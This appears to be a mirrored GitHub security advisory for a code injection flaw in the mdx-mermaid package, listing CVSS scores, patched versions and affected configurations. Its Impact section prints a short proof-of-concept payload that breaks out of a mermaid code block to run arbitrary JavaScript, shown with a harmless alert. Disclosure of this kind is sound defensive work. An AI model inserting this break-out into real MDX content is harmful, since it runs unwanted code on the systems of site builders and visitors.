Lucene search

GitHub Advisory DatabaseGHSA-RVGM-35JW-Q628

HistoryAug 31, 2022 - 10:26 p.m.

Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

2022-08-3122:26:11

CWE-94

GitHub Advisory Database

github.com

code injection

mdx-mermaid

arbitrary javascript

security risk

patches

workarounds

software

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

17.8%

JSON

Impact

Arbitary javascript injection

Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs

` + (function () {
  // Put Javascript code here
  return ''
}()) + `

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A--&gt;B;
    A--&gt;C;
    B--&gt;D;
    C--&gt;D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A--&gt;B;
    A--&gt;C;
    B--&gt;D;
    C--&gt;D;
```

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

Affected configurations

Vulners

Node

mdx-mermaid_projectmdx-mermaidMatch2.0.0-rc1node.js

mdx-mermaid_projectmdx-mermaidRange<1.3.0node.js

VendorProductVersionCPE
mdx-mermaid_projectmdx-mermaid2.0.0-rc1cpe:2.3:a:mdx-mermaid_project:mdx-mermaid:2.0.0-rc1:*:*:*:*:node.js:*:*
mdx-mermaid_projectmdx-mermaid*cpe:2.3:a:mdx-mermaid_project:mdx-mermaid:*:*:*:*:*:node.js:*:*

Vendor	Product	Version	CPE
mdx-mermaid_project	mdx-mermaid	2.0.0-rc1	cpe:2.3:a:mdx-mermaid_project:mdx-mermaid:2.0.0-rc1:::::node.js::
mdx-mermaid_project	mdx-mermaid	*	cpe:2.3:a:mdx-mermaid_project:mdx-mermaid::::::node.js::*